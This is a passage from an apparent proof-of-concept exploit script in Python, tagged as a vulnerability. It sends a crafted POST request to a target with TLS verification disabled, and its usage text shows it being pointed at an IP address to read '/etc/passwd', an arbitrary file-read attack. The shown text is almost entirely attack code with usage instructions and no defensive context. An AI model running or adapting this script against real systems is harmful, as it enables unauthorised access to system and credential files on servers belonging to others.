'keep-alive',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'  }  s = Session()  req = Request('POST', url, data=data, headers=headers)  prepped = req.prepare()  #del prepped.headers['Content-Type']  resp = s.send(prepped,      verify=False,      timeout=15  )    print(prepped.headers)  print(url)  print(resp.headers)  print(resp.status_code)if __name__ == '__main__':    title()    if(len(sys.argv) < 3):      print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))      print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))            exit(0)    else:      exploit(sys.argv[1],sys.argv[2])

Tag

#vulnerability